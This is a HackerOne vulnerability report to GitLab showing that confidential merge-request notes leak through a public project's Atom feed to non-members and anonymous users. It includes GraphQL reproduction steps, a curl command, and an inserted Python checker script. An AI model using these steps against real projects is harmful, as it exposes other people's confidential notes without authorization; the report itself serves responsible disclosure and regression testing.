Confidential notes are visible to non-project members/unauthenticated users via project's RSS feed

HackerOne report #1130704 by jimeno on 2021-03-19, assigned to GitLab Team:

Report

Steps to reproduce

Victim needs to create a project and post a confidential note to it.

  1. As your victim, create a public project.

    create_public_project.png

  2. Create a MR on your project.

    create_test_mr.png

  3. Find the MR object ID via the GraphQL API explorer. Replace my fullPath with yours.

    {  
      project(fullPath: "naaytesting2/h1testpublicproject") {  
        mergeRequest(iid: "1") {  
          id  
        }  
      }  
    }  

    find_mr_id.png

  4. Add a confidential note to the MR as your victim user. We use the GraphQL API explorer again for this. Replace the noteableId with the one you obtained in the previous step.

    mutation xyz {  
      createNote(input: {noteableId: "gid://gitlab/MergeRequest/92779506", body: "confidential note", confidential: true}) {  
        errors  
        clientMutationId  
      }  
    }  

    create_confidential_note.png

  5. Confirm the confidential note was added to the MR by browsing to your MR and refreshing the page.

    verify_confidential_note_was_created.png

  6. As your attacker, who is not a member of the project, visit the MR and confirm you can't view the confidential note.

    attacker_does_not_see_confidential_note_via_ui.png

  7. As your attacker, browse to the RSS feed of the affected project https://gitlab.com/victimuser/projectname.atom and confirm you can read the confidential note created by victim.

    rss_feed_discloses_confidential_note.png

  8. Confirm you can view the confidential note as an unauthenticated user via a simple curl call to the RSS feed of the affected project.

    $ curl -s https://gitlab.com/naaytesting2/h1testpublicproject.atom | grep confi  
    <p data-sourcepos="1:1-1:17" dir="auto">confidential note</p>  
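The eight steps above, condensed into a script that a tester can run against a project or, with no arguments, against an embedded sample feed. This is an added example and not code from the report or from GitLab: it assumes the feed shape visible in step 8 (each Atom entry carrying the rendered note HTML in its content element), uses a constructed SAMPLE_FEED that mimics that shape, and builds the step 4 mutation in the same inline form the report used.

```python
"""Check whether a GitLab project's Atom feed exposes a confidential note.

Added example, not code from the report or from GitLab. It assumes the feed
shape visible in step 8 (each Atom <entry> carrying the rendered note HTML in
<content>); SAMPLE_FEED below is constructed to mimic that shape.
"""
import html
import json
import sys
import urllib.request
import xml.etree.ElementTree as ET

ATOM_NS = {"atom": "http://www.w3.org/2005/Atom"}

# Constructed sample: one ordinary event plus one entry carrying the
# "<p data-sourcepos=...>confidential note</p>" line seen in the report's curl output.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>h1testpublicproject activity</title>
  <entry>
    <id>tag:gitlab.com,2021-03-19:event/1</id>
    <title>victimuser opened merge request !1</title>
    <content type="html">&lt;p dir="auto"&gt;initial MR description&lt;/p&gt;</content>
  </entry>
  <entry>
    <id>tag:gitlab.com,2021-03-19:event/2</id>
    <title>victimuser commented on merge request !1</title>
    <content type="html">&lt;p data-sourcepos="1:1-1:17" dir="auto"&gt;confidential note&lt;/p&gt;</content>
  </entry>
</feed>
"""


def build_create_note_mutation(noteable_gid, body, confidential=True):
    """Payload for the createNote mutation of step 4, in the same inline form
    as the report. json.dumps escapes quotes and backslashes in the body so an
    arbitrary note text cannot break out of the GraphQL string literal."""
    query = (
        "mutation { createNote(input: {noteableId: %s, body: %s, confidential: %s}) "
        "{ errors clientMutationId } }"
        % (json.dumps(noteable_gid), json.dumps(body), "true" if confidential else "false")
    )
    return {"query": query}


def entries_exposing(feed_xml, secret):
    """Titles of every feed entry whose rendered content contains `secret`.

    The content is HTML carried inside an XML text node, so it is decoded
    twice: once by the XML parser, once by html.unescape for bodies that the
    markdown renderer entity-escaped (e.g. '<' or '&' in the note)."""
    root = ET.fromstring(feed_xml)
    hits = []
    for entry in root.findall("atom:entry", ATOM_NS):
        content = entry.findtext("atom:content", default="", namespaces=ATOM_NS)
        if secret in html.unescape(content):
            hits.append(entry.findtext("atom:title", default="", namespaces=ATOM_NS))
    return hits


def fetch_feed(project_url):
    """GET <project>.atom with no token and no cookie, i.e. as the
    unauthenticated user of step 8."""
    req = urllib.request.Request(project_url.rstrip("/") + ".atom",
                                 headers={"Accept": "application/atom+xml"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    # Usage: python feed_leak_check.py <project URL> <note body>
    # With no arguments the constructed SAMPLE_FEED is checked instead.
    if len(sys.argv) == 3:
        feed, secret = fetch_feed(sys.argv[1]), sys.argv[2]
    else:
        feed, secret = SAMPLE_FEED, "confidential note"
    leaked = entries_exposing(feed, secret)
    for title in leaked:
        print("LEAK:", title)
    sys.exit(1 if leaked else 0)
```

The exit status makes the check usable as a regression test after a fix: a non-zero status means at least one anonymous feed entry still carries the note body. Searching the entity-decoded content rather than the raw XML matters for notes containing characters the renderer escapes, which a plain `grep` on the raw feed would miss.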

Impact

Confidential notes are visible to non-project members via the project's RSS feed, while the UI restricts access to them.

Examples

Example project: https://gitlab.com/naaytesting2/h1testpublicproject.

Visit the MR at https://gitlab.com/naaytesting2/h1testpublicproject/-/merge_requests/1 and confirm you can't see the confidential note.

Visit https://gitlab.com/naaytesting2/h1testpublicproject.atom and confirm you can read the confidential note (<p data-sourcepos="1:1-1:17" dir="auto">confidential note</p>).

Please, find the example project exported and attached as a ZIP file. 2021-03-19_14-32-420_naaytesting2_h1testpublicproje_export.tar.gz

What is the current bug behavior?

Confidential notes are available to non-project members via the project's RSS feed.

What is the expected correct behavior?

Confidential notes aren't visible to non-project members via the project's RSS feed.

Relevant logs and/or screenshots

N/A

Output of checks

This bug happens on GitLab.com

Results of GitLab environment info

N/A

Impact

Confidential notes are visible to non-project members or unauthenticated users via the project's RSS feed, while the UI restricts access to them.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!